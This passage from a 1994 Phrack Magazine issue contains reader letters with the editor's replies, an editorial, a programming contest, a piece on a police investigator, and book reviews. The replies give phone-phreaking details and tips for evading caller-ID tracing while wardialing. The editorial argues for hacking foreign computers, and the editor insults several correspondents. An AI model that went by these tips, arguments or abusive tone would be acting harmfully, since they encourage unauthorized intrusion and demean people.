framework that underlines the cyberian movement.  The show's content and
style will make it readily available to the MTV and Generation X demographic
groups as well as executives who want to stay on top of the latest
technological advances.  Individuals who read Mondo 2000 and Wired magazine
will also naturally latch on to this electronic
presentation of their favorite topics.

T h e   G u i d e s

Mike Goedecke - Director/Graphic Designer
Mike was the Writer/Director/Cinematographer for the Interplay CD-ROM game
entitled Sim City.  Acting as graphic designer for the Voyager Co.- Criterion
Laser Disc Division his work is featured on titles such as: Akira, DEVO-The
Truth About De-Evolution, The Adventures of Baron Munchausen, and Spartacus.
 Most recently he collaborated with Los Angeles Video Artist Art Nomura on a
video installation piece entitled Digital Mandala.  The piece was edited,
composited , and mastered to Laser Disc using an Apple Macintosh Computer and
off-the-shelf software.  The installation is scheduled to tour museums and
art galleries across the United States and Europe.  While attending
Cinema/Television Graduate School at the University of Southern California,
Mike directed the award winning documentary short Rhythm, which celebrates
various musical cultures.

Todd LeValley - Producer/Graphic Designer
Todd is the Producer/Director of CyberCulture: Visions From The New Edge, a
documentary that introduces the electronic underground.  This project has
been warmly received at numerous "Cyber Festivals" around the country, as
well as at the Director's Guild Of America, and is currently being
distributed by FringeWare Inc.  Todd's commercial experience includes being
the in-house graphic designer for Barbour/Langley Productions  designing,
compositing, and producing the graphic packages for several 20th Century Fox
Television pilots and The Sci-Fi Trader for the USA Network/Sci-Fi Channel.
 Todd is a graduate of the Cinema/Television program at Loyola Marymount
University.

Jeff Runyan - Cinematographer/Editor
Jeff received an MFA from the University of Southern California's Graduate
School of Cinema/Television with an emphasis in cinematography and editing.
 He studied cinematography under the guidance of Woody Omens, ASC. and Earl
Rath, ASC., and editing with Edward Dmytryk.  Jeff was the cinematographer on
the award wining documentary Rhythm.  He has recently completed shooting and
editing a documentary on Academy Award winning Cinematographer Conrad Hall
for the ASC and has just finished directing a short film for USC
Teleproductions.

Douglas Rushkoff - Cyber Consultant/Author
Douglas is the author of the best selling Harper Collins San Francisco novel,
Cyberia.  He spent two years of his life living among the key players in the
cyber universe.  Douglas knows the New Edge well and is providing us with the
map to its points of interest, rest stops and travelers.

For more information, please contact:
Todd LeValley, Producer
Belief Productions
(310) 545-8138
belief@eworld.com

[Dear New Edge:

 You have got to be kidding me.  "Readers of Wired and Mondo 2000 will
 naturally latch on to this electronic presentation of their favorite
 topics?"

 Aren't we awful fucking high on ourselves?  Christ.  Mondo & Wired
 readers and writers (and stars) are themselves so fucking far removed
 from the real meat of the underground, that they wouldn't
 even be able to relate to it.  Obviously this "documentary"
 is going to be aimed at the wannabes who sit at home furiously
 masturbating to "Cyborgasm" while installing FRACTINT, being very
 careful not to soil their copy of "The Hacker Crackdown."  Oh joy.

 These guys are so fucking out of it, they sent me two letters.
 One addressed to Phrack, the other to Phrack / Emmanuel Goldstein.
 Maybe they think we're 2600.

 CYBER-COUNT:  12 occurrences.

 That's kind of low.  I'm surprised your public relations people didn't
 have you add in a few more cyber-this's or cyber-that's into the
 blurb.  Gotta keep that cyber-count high if you want to get those
 digi-bucks out of those cyberians!  CYBER!!!

 Read my review of Cyberia guys...find a new pop-fad to
 milk for cash.]

------------------------------------------------------------------------------

In less than 3 weeks, I will be leaving for Basic Training.  Once out of
there, I will be working on Satellite Data Transmissions for the US
Army.  I am highly excited, just waiting to see what type of computers
I will be working on.  Anyways, I will be enrolled in a 32-week
accelerated technical class teaching me all about satellites, and
the computers that I will be using.  Here's the kick.  I'll be writing
a series of Tech Journals detailing the workings/operations of/weaknesses,
and the use of the systems.  I was wondering if you would be interested
in carrying these.  I've read Phrack for a long time, but it is an off
the wall subject.  I'll also be playing with the military phone system,
in hopes of finding out what the ABCD tones do.  (I heard from a file
that Military phones utilize them but I'm still a civilian, and am
clueless).

Thanks for keeping me informed
Kalisti!

[Sorry to hear about your impending Basic Training.  I'm not big on
 the military, as they would make me chop off all my hair.

 About the Satellite systems:  YES  If you do indeed find time to write
 up any files on how they work, systems involved, weaknesses, etc.
 I'D LOVE TO PRINT THAT!  Just make sure you don't blow your clearance.

 Satellites are very cool.  I'm about to buy a Ku Band disk to do some
 packet radio type stuff.  A bit low-tech compared to the Army, but hell,
 I'm on a budget.

 ABCD...they are used for prioritizing calls on AUTOVON.  FTS doesn't
 use them (I think), and they can only be used on certain lines.

 They are:

 A = priority
 B = priority override
 C = flash
 D = flash override

 For instance, if you want to make it known that this is an important
 call, you hit the "a" button before dialing.  It establishes a
 priority-class call, which may cause a light to come on or something
 as equally attention grabbing at the called party's end.  Priority
 calls cannot be interrupted, except by a Priority Override" etc,
 with Flash Override being the highest class.

 If you do these from an improper line, you will get an error message.
 The one I used to get when BS'ing AUTOVON op's long ago
 was "The President's use of this line is not authorized." Funny.

 Let me know if any of this is still valid.]



------------------------------------------------------------------------------

Dear Phrack,
The following is a copy of a Toneloc found file my friend got.  As happens
to my friend a lot the numbers aren't valid. But, you'll see he found at least
one System 75.  It appears that the 75 had a tracer installed on it already.
My friend did not get a call back on it, and nothing has been done as far
as we know.  But, I still wonder -- Is scanning no longer safe?


                                        Castor [612]

56X-XXXX  22:57:34 03-Apr-94 C  CONNECT 1200

Login: b
Password:
INCORRECT LOGIN

Login: c
Password:
INCORRECT LOGIN

56X-XXXX  23:04:12 03-Apr-94 C  CONNECT 1200

c
 Unknown command error
Ready
d
 Unknown command error
Ready
e
 Unknown command error
Ready
b
 Unknown command error
Ready

56X-XXXX  23:49:19 03-Apr-94 C  CONNECT 1200

 KEYBOARD LOCKED, WAIT FOR LOGIN
 [1;24r [1;1H [0J

Login: b
Password:
INCORRECT LOGIN

56X-XXXX  01:23:28 04-Apr-94 C  CONNECT 1200

Login: b
Password:
INCORRECT LOGIN

Call traced to 612-XXX-XXXX.
Saving number in security log for further investigation.

[Jeez.  That sure does suck.

 Well, live and learn kiddoes.  1994 is not the time to be hacking
 by direct dialing local numbers.  It's just not all that smart.

 Caller-ID has been tariffed in a lot of RBOCS.  A lot of modem
 manufacturers implemented caller-id features into their equipment.
 Having these features in the equipment means that it won't be long
 before people redesign all their login programs to make use of
 these features.  I would.

 I've got an ISDN line.  Every time I call out, the SPID (phone number)
 of the B channel I'm using is broadcast.  There is nothing I can do
 about that.  On a remote connection, almost all decent ISDN terminal
 adaptors have the option to block any SPID they don't know.  They won't
 even answer the phone, because they receive and interpret the phone
 number before any session is established.

 Yeah, well, that's ISDN, but it will not take a genius to do a few
 quick hacks on some linux box and we will suddenly be inundated with all
 kinds of "security packages" that use modems with Caller-ID.

 Yeah, I know, *67 (or whatever it is) to block the data, or
 route the call through another carrier so the data won't get passed
 (10288-NXX-XXXX).  The data is still in the system, just not being
 transmitted from the switch out to the party being called.

 It amazes me how many really smart people I know have been busted
 solely because they were hacking local systems and calling them
 directly.

 Scanning has always been a very tricky subject.  Since you are paying
 for a phone line, and if you have flat-rate service, you are
 thereby entitled to call as many numbers as you want.  The big issue
 a while back was dialing sequentially (which set some telcos on a rampage
 because call usage patterns looked like telemarketing machines).
 The other problem is harassment.  One call to an individual is a wrong
 number.  Two is bordering on harassment.  So, doing a complete scan
 and calling the carriers back through some other method would be
 a fairly good idea.  And always have your calls forwarded to a
 non-working number so the 5,000 assholes who call-return you
 during the scan won't interfere.

 If you are lucky enough to live in the boonies, you are probably
 still somewhat safe, but everyone else...be careful.]

------------------------------------------------------------------------------

Phrack-

        I was wondering if anyone has ever done an article on breaking
Novell Network through a workstation.  I've heard it can be done through
the SysAdmin computer, but is there a way to find the userlist and
passwords?  Also how would I go about cleaning up after myself so as to
not leave a trace on the logs.  I would appreciate a way other than screen
capture, but if anyone knows of a good boot record booting program to
do a capture of every key typed that would be great, and maybe it
could be uuencoded in the next Phrack!

        Thanks again for making the best, ass kickin', a step above the
rest, brain moving, earth shaking, body shivering, fist shaking, totally
bitchin', muy excelente, awesome H/P magazine in the whole world!  :)

                        Sincerely,

                               The Warden

[Thanks for the compliments...

 About your question though, I'm not quite sure what you mean.
 In a NetWare environment there really isn't any userlist and passwords
 that you can get at.  You can run the syscon utility and look at all the
 usernames, but not much more.  The passwords are stored in what's known
 as the "bindery."  These are 3 files in the sys/system directory
 called NET$OBJ.SYS, NET$VAL.SYS, and NET$PROP.SYS.  If you can
 pull a password out of those files, I will shit in my hat and eat it.

 Beyond that, yes, a key-capture program is definitely the ideal
 solution for monitoring activity on a PC workstation.  There is
 one in this issue.]


------------------------------------------------------------------------------

Hi,
   I've Been reading your magazine for a long time now, my eyes light up when
I see an advert for a UK BBS with related hacking/phreaking articles or files
on it, but when I try to ring them they are usually gone.
I've been searching for ages for BBS's in the UK with these kind of articles
on them but I've had no luck, Even postings on the USENET had little results.
I have had a few boards which are shady but they ask unusual questions about
abiding to rules/laws about hacking then they prompt with fake login and
registration schemes.

If you have some, could you possibly send or publish a list of shady UK BBS's
Id be extremely grateful

Cheers,

Steven

[Steven:

 Hell, I don't even know the numbers to any "shady" bulletin boards here
 in America.  The only UK hacker bbs I knew of in recent years was
 Unauthorised Access, but I'm sure that's the advert you are referring to.

 Maybe someone else in the UK knows something decent to call over there.
 Any takers? ]

------------------------------------------------------------------------------

[THE GRADY FILES]

Many of you may remember the NSA Security Manual we published last
issue.  That single file generated more press and hype than I'd
seen in a long time.  It was mentioned in several newspapers, it
appeared on television.  It was ridiculous.  The document is
available to anyone who can fill out a FIOA request.

Regardless, people went zany.  At first I couldn't figure out
why everyone was so worked up, and then I caught wind of Grady
Ward.  Grady had posted the document to the net (with all mention
of Phrack deleted from it) in several USENET forums alt.politics.org.nsa,
talk.politics.crypto and comp.org.eff.talk.  Several readers of
Phrack were quick to jump up and point out that Grady had obtained
it from the magazine (thanks guys!) which he grudgingly admitted.
Grady got to be in the spotlight for a while as the Phrack/NSA Handbook
thread continued to grow.

In the meantime, Grady was either calling, or giving him the
benefit of the doubt, getting called by an awful lot of press.
And even more compelling is the way he'd began pronouncing my
impending federal raid on so many newsgroups.

And of course, I don't have time to read any of that USENET crap
so I'm oblivious to all of this.  Then I got a message from Grady.

[GRADY WRITES]

You might want to get ready for the FBI
serving a warrant on you for information
about the NSA security employee manual
published in Phrack 45;
the NSA security people called me about 10 minutes
ago to talk about how it got on the net.

I being very cooperative, gave him
your address in Austin.

Grady
707-826-7715

[I REPLY]

Get a grip.

Nothing that was contained in that file could not
be obtained through other sources.


[GRADY REPLIES]

Just because you did nothing illegal, doesn't mean that
you won't be annoyed by the FBI.  Generally they will
be very polite however.

Gripping.  Now what?

[I REPLY]

Ok,

If someone actually did contact you, what was his name and number.
I will forward that to my lawyer.

[GRADY REPLIES]

I have received your mail regarding "Re: NSA"
It will be read immediately when I return.

If you are seeking more information on the
Moby lexical databases, please run

finger grady@netcom.com

for general information or help downloading
live samples and a postscript version of our
current brochure via anonymous ftp.

Thanks - Grady Ward

-------------------

He never answered my mail.

------------------------------------------------------------------------------

Dear Sir:

Please refrain from sending such material to this address in the future!
Since this address has been usubscribed from the Phrack mailing list,
it means that further mailings are undesirable.

I would also wish to remind you that maintaining lists of people's email
without consent is quite immoral and devious.  How hypocritical of
you, who decry all such behavior when it is practiced by corporations
or governments.

Thank you.
robbie@mundoe.maths.mu.oz.au

[PHRACK EDITOR ABUSES POWER:

 Dear Sir:

 Please excuse the mailing.  Have you ever heard of a mistake?
 Have you ever heard of an oversight?

 Is it really that much of an inconvenience for you to hit the "d" key
 to remove one small piece of unwanted mail?

 This being said, I would also like to invite you to go fuck yourself.

 ** I guess this guy does not like to get unsolicited mail **]

------------------------------------------------------------------------------

You people really piss me off!  You're undermining the fun and
enjoyment of the rest of the internet users just for your juvenile
games and illegal activities.  Do you realize how much better off we'd
be if you all just went away and left the Net to honest people like me?
There is no place in today's society for a bunch of maladjusted
paranoid psychotics like yourselves.  Please do all of us users a favor
and go jump in a river.

Kevin Barnes
kebar@netcom.com

[ABUSE OF POWER CONTINUES...WILL ERIKB EVER STOP?

 Hey Keith:

 Thanks a lot for the letter!

 You know, it does my heart good to hear from such kind and caring
 folks like yourself.  It's so fortunate for the Internet that there are
 people like yourself who take it upon themselves to become martyrs for
 their causes and express their ideals in such an intelligent manner.

 It's fascinating to me that you can send such email sight-unseen.
 Do you know who you are writing to?  Do you even have the slightest
 idea?  What do you hope to accomplish?  Do you have any idea?

 This particular "maladjusted paranoid psychotic" to whom you have so
 eloquently addressed is an engineer in the R&D of a Fortune 500 computer
 company, and that along with outside consulting will net me about
 six-figures this tax year.  I've consulted for telephone companies,
 governments, aerospace, financial institutions, oil companies (the list
 goes on...) and quite frankly I don't do anything even remotely illegal.
 In fact, one recent and quite prominent quote from me was "I only
 hack for money."

 Now, about the silent majority of "honest people" like yourself that you
 have so self-rightously chosen to represent...

 I've been using the net since the early 80's (arpa-days) initially
 through a rms granted guest account on MIT-OZ.  I've continued to
 work with other Internet Providers to cover the asses of the so-called
 "honest people" of which you include yourself.

 Now, in my view, if it were not for people like us, who consistently
 expose and pinpoint weaknesses in the operating systems and networking
 technologies that you use for your "fun and enjoyment" and that I use
 for MY JOB, you would continue to be at serious risk.  But, perhaps
 ignorance is truly bliss, and if so, then Keith, you are probably one of
 the happiest people on this fine planet.

 Now, per your request, I may just go jump in a river, as the one near
 my house is quite nice, and it is almost 100 degrees here in Texas.
 I only ask that you do me one small favor:

 print out 500 copies of this letter, roll them up into a paper fist,
 and shove them into any orifice on your person that meets your criteria
 as deserving.

 ** I guess this guy doesn't like me...or you **

 EDITORIAL ABUSE ENDS]
-----------------------------------------------------------------------------

                              ==Phrack Magazine==

                 Volume Five, Issue Forty-Six, File 2a of 28

****************************************************************************

                                Phrack Editorial


If you aren't from America, this editorial really isn't meant for you,
so read on with warning, or go on to the next file.

-----------------------------------------------------------------------------

Stupid hackers.

We've got to do something to clean up our image.

We truly are "America's Most Valuable Resource," as ex-CIA spook Robert
Steele has said so many times.  But if we don't stop screwing over our own
countrymen, we will never be looked at as anything more than common
gutter trash.  Hacking computers for the sole purpose of collecting
systems like space-age baseball cards is stupid, pointless and can only
lead to a quick trip up the river.

Obviously, no one is going to stop hacking.  I've been lucky in that I've
found people willing to pay me to hack for them rather than against
them, but not everyone can score such a coup.  What kind of alternative
can the rest of the community have?

Let's say that everyone was given an opportunity to hack without any
worry of prosecution with free access to a safe system to hack from,
with the only catch being that you could not hack certain systems.
Military, government, financial, commercial and university systems would
all still be fair game.  Every operating system, every application, every
network type all open to your curious minds.

Would this be a good alternative?  Could you follow a few simple
guidelines for the offer of virtually unlimited hacking with no worry of
governmental interference?

Where am I going with this?

Right now we are at war.  You may not realize it, but we all feel the
implications of this war, because it's a war with no allies, and
enormous stakes.  It's a war of economics.

The very countries that shake our hands over the conference tables of
NATO and the United Nations are picking our pockets.  Whether it be the
blatant theft of American R&D by Japanese firms, or the clandestine and
governmentally-sanctioned bugging of Air France first-class seating, or
the cloak-and-dagger hacking of the SWIFT network by the German BND's
Project Rahab, America is getting fucked.

Every country on the planet is coming at us.  Let's face it, we are the
leaders in everything.  Period.  Every important discovery in this
century has been by an American or by an American company.  Certainly
other countries have better profited by our discoveries, but
nonetheless, we are the world's think-tank.

So, is it fair that we keep getting shafted by these so-called "allies?"
Is it fair that we sit idly by, like some old hound too lazy to scratch
at the ticks sucking out our life's blood by the gallon?  Hell no.

Let's say that an enterprising group of computer hackers decided to
strike back.  Using equipment bought legally, using network connections
obtained and paid for legally, and making sure that all usage was
tracked and paid for, this same group began a systematic attack of
foreign computers.  Then, upon having gained access, gave any and all
information obtained to American corporations and the Federal
government.

What laws would be broken?  Federal Computer Crime Statutes specifically
target so-called "Federal Interest Computers." (ie: banks,
telecommunications, military, etc.)  Since these attacks would involve
foreign systems, those statutes would not apply.  If all calls and
network connections were promptly paid for, no toll-fraud or other
communications related laws would apply.

International law is so muddled that the chances of getting extradited
by a country like France for breaking into systems in Paris from Albuquerque
is slim at best.  Even more slim when factoring in that the information
gained was given to the CIA and American corporations.

Every hacking case involving international breakins has been tried and
convicted based on other crimes.  Although the media may spray headlines
like "Dutch Hackers Invade Internet" or "German Hackers Raid NASA,"
those hackers were tried for breaking into systems within THEIR OWN
COUNTRIES...not somewhere else.  8lgm in England got press for hacking
world-wide, but got nailed hacking locally.  Australia's Realm Hackers:
Phoenix, Electron & Nom hacked almost exclusively other countries, but
use of AT&T calling cards rather than Australian Telecom got them a charge
of defrauding the Australian government.  Dutch hacker RGB got huge press
hacking a US military site and creating a "dquayle" account, but got
nailed while hacking a local university.  The list goes on and on.

I asked several people about the workability of my proposal.  Most
seemed to concur that it was highly unlikely that anyone would have to
fear any action by American law enforcement, or of extradition to
foreign soil to face charges there.  The most likely form of retribution
would be eradication by agents of that government.  (Can you say,
"Hagbard?")

Well, I'm willing to take that chance, but only after I get further
information from as many different sources as I can.  I'm not looking
for anyone to condone these actions, nor to finance them.  I'm only
interested in any possible legal action that may interfere with my
freedom.

I'm drafting a letter that will be sent to as many different people as
possible to gather a fully-formed opinion on the possible legal
ramifications of such an undertaking.  The letter will be sent to the FBI,
SS, CIA, NSA, NRO, Joint Chiefs, National Security Council, Congress,
Armed Forces, members of local and state police forces, lawyers, professors,
security professionals, and anyone else I can think of.  Their answers
will help fully form my decision, and perhaps if I pass along their
answers, will help influence other American hackers.

We must take the offensive, and attack the electronic borders of other
countries as vigorously as they attack us, if not more so.  This is
indeed a war, and America must not lose.

->Erik Bloodaxe...Hacker...American.

---------------------------

Ok, so maybe that was a bit much.  But any excuse to hack without fear
should be reason enough to exert a bit of Nationalism.

I'd much rather be taken out by the French in some covert operation and
go out a martyr, than catch AIDS after being raped by the Texas
Syndicate in the metal shop of some Federal Prison.  Wouldn't you?


--------------------------------------------------------------------------------


                         ==Phrack Magazine==

              Volume Five, Issue Forty-Six, File 3 of 28


                           //   //  /\   //   ====
                          //   //  //\\ //   ====
                         ==== //  //  \\/   ====

                     /\   //  // \\    //  /===   ====
                    //\\ //  //   //  //   \=\   ====
                   //  \\/    \\ //  //   ===/  ====

                                 PART I

------------------------------------------------------------------------------

                        !! NEW PHRACK CONTEST !!

Phrack Magazine is sponsoring a programming contest open to anyone
who wishes to enter.

Write the Next Internet Worm!  Write the world's best X Windows wardialer!
Code something that makes COPS & SATAN look like high school Introduction
to Computing assignments.  Make the OKI 1150 a scanning, tracking, vampire-
phone.  Write an NLM!  Write a TSR!  Write a stupid game!  It doesn't
matter what you write, or what computer it's for!  It only matters that you
enter!

Win from the following prizes:

     Computer Hardware & Peripherals
     System Software
     Complete Compiler packages
     CD-ROMS
     T-Shirts
     Magazine Subscriptions
     and MANY MORE!

STOP CRACKING PASSWORDS AND DO SOMETHING WITH YOUR LIFE!

Enter the PHRACK PROGRAMMING CONTEST!

The rules are very simple:

1)  All programs must be original works.  No submissions of
    previously copyrighted materials or works prepared by
    third parties will be judged.

2)  All entries must be sent in as source code only.  Any programming
    language is acceptable.  Programs must compile and run without
    any modifications needed by the judges.  If programs are specific
    to certain platforms, please designate that platform.  If special
    hardware is needed, please specify what hardware is required.
    If include libraries are needed, they should be submitted in addition
    to the main program.

3)  No virii accepted.  An exception may be made for such programs that
    are developed for operating systems other than AMIGA/Dos, System 7,
    MS-DOS (or variants), or OS/2.  Suitable exceptions could be, but are not
    limited to, UNIX (any variant), VMS or MVS.

4)  Entries may be submitted via email or magnetic media.  Email should be
    directed to phrack@well.com.  Tapes, Diskettes or other storage
    media should be sent to

         Phrack Magazine
         603 W. 13th #1A-278
         Austin, TX 78701

5)  Programs will be judged by a panel of judges based on programming skill
    displayed, originality, usability, user interface, documentation,
    and creativity.

6)  Phrack Magazine will make no claims to the works submitted, and the
    rights to the software are understood to be retained by the program
    author.   However, by entering, the Author thereby grants Phrack Magazine
    permission to reprint the program source code in future issues.

7)  All Entries must be received by 12-31-94.  Prizes to be awarded by 3-1-95.

-------------------------INCLUDE THIS FORM WITH ENTRY-------------------------

Author:

Email Address:

Mailing Address:



Program Name:


Description:




Hardware & Software Platform(s) Developed For:



Special Equipment Needed (modem, ethernet cards, sound cards, etc):



Other Comments:


------------------------------------------------------------------------------
                             COMPUTER COP PROPHILE
                               FOLLOW-UP REPORT

                               LT. WILLIAM BAKER
                           JEFFERSON COUNTY POLICE

                                     by

                                The Grimmace


 In PHRACK 43, I wrote an article on the life and times
of a computer cop operating out of the Jefferson County Police
Department in Louisville, Kentucky.  In the article, I included
a transcript of a taped interview with him that I did after
socially engineering my way through the cop-bureaucracy in his
department. At the time I thought it was a hell of an idea and a
lot of PHRACK readers probably got a good insight into how the
"other side" thinks.

 However, I made the terminal mistake of underestimating
the people I was dealing with by a LONG shot and felt that I
should write a short follow-up on what has transpired since that
article was published in PHRACK 43.

 A lot of the stuff in the article about Lt. Baker was
obtained by an attorney I know who has no reason to be friendly
to the cops.  He helped me get copies of court transcripts which
included tons of information on Baker's training and areas of
expertise.  Since the article, the attorney has refused to talk
to me and, it appears, that he's been identified as the source
of assistance in the article and all he will say to me is that
"I don't want any more trouble from that guy...forget where you
left my phone number."  Interesting...no elaboration...hang up.

 As I recall, the PHRACK 43 issue came out around
November 17th.  On November 20th, I received a telephone call
where I was living at the home of a friend of mine from Lt.
Baker who laughingly asked me if I needed any more information
for any "future articles".  I tried the "I don't know what
you're talking about" scam at which time he read to me my full
name, date of birth, social security number, employer, license
number of my car, and the serial number from a bicycle I just
purchased the day before.  I figured that he'd run a credit
history on me, but when I checked, there had been no inquiries
on my accounts for a year.  He told me the last 3 jobs I'd held
and where I bought my groceries and recited a list of BBSs I was
on (two of which under aliases other than The Grimmace).

 This guy had a way about him that made a chill run up my
spine and never once said the first threatening or abusive thing
to me. I suppose I figured that the cops were all idiots and
that I'd never hear anything more about the article and go on to
write some more about other computer cops using the same method.
I've now decided against it.

 I got the message...and the message was "You aren't the
only one who can hack out information."  I'd always expected to
get the typical "cop treatment" if I ever got caught doing
anything, but I think this was worse.  Hell, I never know where
the guy's gonna show up next.  I've received cryptic messages on
the IRC from a variety of accounts and servers all over the
country and on various "private" BBSs and got one on my birthday
on my Internet account...it traced back to an anonymous server
somewhere in the bowels of UCLA.  I don't know anyone at UCLA
and the internet account I have is an anonymous account actually
owned by another friend of mine.

 I think the point I'm trying to make is that all of us
have to be aware of how the cops think in order to protect
ourselves and the things we believe in.  But...shaking the
hornet's nest in order to see what comes out maybe isn't the
coolest way to investigate.

 Like I wrote in my previous article, we've all gotten a
big laugh from keystone cops like Foley and Golden, but things
may be changing.  Local and federal agencies are beginning to
cooperate on a regular basis and international agencies are also
beginning to join the party.

 The big push to eradicate child-pornography has led to a number of
hackers being caught in the search for the "dirty old men" on the Internet.
Baker was the Kentucky cop who was singularly responsible for the bust of the
big kiddie-porn FSP site at the University of Birmingham in England back
in April and got a lot of press coverage about it.  But I had personally
never considered that a cop could hack his way into a password-protected
FSP site.  And why would he care about something happening on the other
side of the world?  Hackers do it, but not cops...unless the cops are
hackers.  Hmmm...theories anyone?

 I don't live in Louisville anymore...not because of
Baker, but because of some other problems, but I still look over
my shoulder.  It would be easier if the guy was a prick, but I'm
more paranoid of the friendly good-ole boy than the raving
lunatic breaking in our front doors with a sledge hammer.  I
always thought we were safe because we knew so much more than
the people chasing us.  I'm not so certain of that anymore.

 So that's it.  I made the mistakes of 1) probably
embarrassing a guy who I thought would never be able to touch me
and 2), drawing attention to myself.  A hacker's primary
protection lies in his anonymity...those who live the high
profiles are the ones who take the falls and, although I haven't
fallen yet, I keep having the feeling that I'm standing on the
edge and that I know the guy sneaking up behind me.

From the shadows--
   The Grimmace
                      [HsL - RAt - UQQ]

------------------------------------------------------------------------------

                              !! PHRACK READS  !!

                         "Cyberia" by Douglas Rushkoff
                            Review by Erik Bloodaxe

Imagine a book about drugs written by someone who never inhaled.
Imagine a book about raves written by someone saw a flyer once.
Imagine a book about computers by someone who someone who thinks
     a macintosh is complex.

Imagine an author trying to make a quick buck by writing about something
     his publisher said was hot and would sell.

And there you have Cyberia, by Douglas Rushkoff.

I have got to hand it to this amazing huckster Rushkoff, though.  By
publishing Cyberia, and simultaneously putting out "The Gen X Reader,"
(which by the way is unequaled in its insipidness), he has covered all
bases for the idiot masses to devour at the local bookseller.

Rushkoff has taken it upon himself to coin new terms such as
"Cyberia," the electronic world we live in; "Cyberians," the people
who live and play online; etc...

Like we needed more buzzwords to add to a world full of "Infobahns"
"console cowboys," and "phrackers."  Pardon me while I puke.

The "interviews" with various denizens of Rushkoff's "Cyberia" come off
as fake as if I were to attempt to publish an interview with Mao Tse Tung
in the next issue of Phrack.

We've got ravers talking on and on about "E" and having deep conversations
about smart drugs and quantum physics.  Let's see:  in the dozens of raves
I've been to in several states the deepest conversation that popped
up was "uh, do you have any more of that acid?" and "this mix is cool."
And these conversations were from the more eloquent of the nearly all under
21 crowd that the events attracted.  Far from quantum physicians.
And beyond that, its been "ecstasy" or "X" in every drug culture I've wandered
through since I walked up the bar of Maggie Mae's on Austin, Texas' 6th Street
in the early 80's with my fake id and bought a pouch of the magic elixir over
the counter from the bartender (complete with printed instructions).
NOT "E."  But that's just nit-picking.

Now we have the psychedelic crowd.  Listening to the "Interviews" of these
jokers reminds me of a Cheech and Chong routine involving Sergeant Stedanko.
"Some individuals who have smoked Mary Jane, or Reefer oftimes turn to
harder drugs such as LSD."  That's not a quote from the book, but it may
as well be.  People constantly talk about "LSD-this" and "LSD-that."
Hell, if someone walked into a room and went on about how he enjoyed his
last "LSD experience" the way these people do, you'd think they were
really really stupid, or just a cop.  "Why no, we've never had any of
that acid stuff.  Is it like LSD?"  Please.

Then there are the DMT fruitcakes.  Boys and girls, DMT isn't being sold
on the street corner in Boise.  In fact, I think it would be easier for most
people to get a portable rocket launcher than DMT.  Nevertheless, in every
fucking piece of tripe published about the "new psychedlicia" DMT is
splattered all over it.  Just because Terrance Fucking McKenna
saw little pod people, does not mean it serves any high position
in the online community.

And Hackers?  Oh fuck me gently with a chainsaw, Douglas.  From Craig Neidorf's
hacker Epiphany while playing Adventure on his Atari VCS to Gail
Thackeray's tearful midnight phonecall to Rushkoff when Phiber Optik
was raided for the 3rd time.  PLEASE!  I'm sure Gail was up to her eyebrows
in bourbon, wearing a party hat and prank calling hackers saying "You're next,
my little pretty!"  Not looking for 3rd-rate schlock journalists to whine to.

The Smart Drink Girl?  The Mondo House?  Gee...how Cyber.  Thanks, but
no thanks.

I honestly don't know if Rushkoff really experienced any of this nonsense,
or if he actually stumbled on a few DMT crystals and smoked this
reality.  Let's just say, I think Mr. Rushkoff was absent the day
his professor discussed "Creative License in Journalism" and just decided
to wing it.

Actually, maybe San Francisco really is like this.  But NOWHERE else on
the planet can relate.  And shit, if I wanted to read a GOOD San
Francisco book, I'd reread Armistead Maupin's "Tales of the City."
This book should have been called "Everything I Needed to Know About
Cyber-Culture I Learned in Mondo-2000."

Seriously...anyone who reads this book and finds anything remotely
close to the reality of the various scenes it weakly attempts to
cover needs to email me immediately.  I have wiped my ass with
better pulp.

------------------------------------------------------------------------------

                    BOOK REVIEW:  INFORMATION WARFARE
                   CHAOS ON THE ELECTRONIC SUPERHIGHWAY
                            By Winn Schwartau

 INFORMATION WARFARE - CHAOS ON THE ELECTRONIC SUPERHIGHWAY
 By Winn Schwartau.  (C)opyright 1994 by the author
 Thunder's Mouth Press, 632 Broadway / 7th floor / New York, NY 10012
 ISBN 1-56025-080-1 - Price $22.95
 Distributed by Publishers Group West, 4065 Hollis St. / Emeryville, CA 94608
 (800) 788-3123

 Review by Scott Davis (dfox@fennec.com)
 (from tjoauc1-4  ftp: freeside.com /pub/tjoauc)

 If you only buy one book this year, make sure it is INFORMATION WARFARE!
 In my 10+ years of existing in cyberspace and seeing people and organizations
 debate, argue and contemplate security issues, laws, personal privacy,
 and solutions to all of these issues...and more, never have I seen a more
 definitive publication. In INFORMATION WARFARE,  Winn Schwartau simply
 draws the line on the debating. The information in this book is hard-core,
 factual documentation that leaves no doubt in this reader's mind that
 the world is in for a long, hard ride in regards to computer security.
 The United States is open to the world's electronic terrorists.
 When you finish reading this book, you will find out just how open we are.

 Mr. Schwartau talks about industrial espionage, hacking, viruses,
 eavesdroping, code-breaking, personal privacy, HERF guns, EMP/T bombs,
 magnetic weaponry, and the newest phrase of our generation...
 "Binary Schizophrenia". He exposes these topics from all angles. If you
 spend any amount of time in Cyberspace, this book is for you.

 How much do you depend on technology?

 ATM machines, credit cards, toasters, VCR's, televisions, computers,
 telephones, modems...the list goes on. You use technology and computers
 and don't even know it! But the point is...just how safe are you from
 invasion? How safe is our country's secrets? The fact is - they are NOT
 SAFE! How easy is it for someone you don't know to track your every move
 on a daily basis? VERY EASY! Are you a potential victim to fraud,
 breech of privacy, or general infractions against the way you carry
 on your daily activities?  YES! ...and you'd never guess how vulnerable
 we all are!

 This book will take you deep into places the government refuses to
 acknowledge. You should know about INFORMATION WARFARE. Order your
 copy today, or pick it up at your favorite book store. You will not
 regret it.

------------------------------------------------------------------------------

      _Firewalls and Internet Security: Repelling the Wily Hacker_

              William R. Cheswick <ches@research.att.com>
               Steven M. Bellovin <smb@research.att.com>

                   Addison-Wesley, ISBN 0-201-63357-4
                         306 + XIV = 320 pages
                      (Printed on recycled paper)

                  A-Somewhat-Less-Enthusiastic-Review

                         Reviewed by Herd Beast

The back of this book claims that, "_Firewalls and Internet Security_
gives you invaluable advice and practical tools for protecting your
organization's computers from the very real threat of hacker attacks."
That is true.  The authors also add something from their knowledge of
these hacker attacks.  The book can be roughly separated into two
parts: Firewalls, and, you guessed it: Internet Security.  That is
how I see it.  The book itself is divided into four parts (Getting
Started, Building Your Own Firewall, A Look Back & Odds and Ends),
three appendixes, a bibliography, a list of 42 bombs and an index.

The book starts with overall explanations and an overview of the
TCP/IP protocol.  More than an overview of the actual TCP/IP protocol,
it is a review of services often used with that protocol, and the
security risks they pose.  In that chapter the authors define
"bombs" -- as particularly serious security risks.  Despite that fact,
and the tempting bomb list in the end, this book is not a guide for
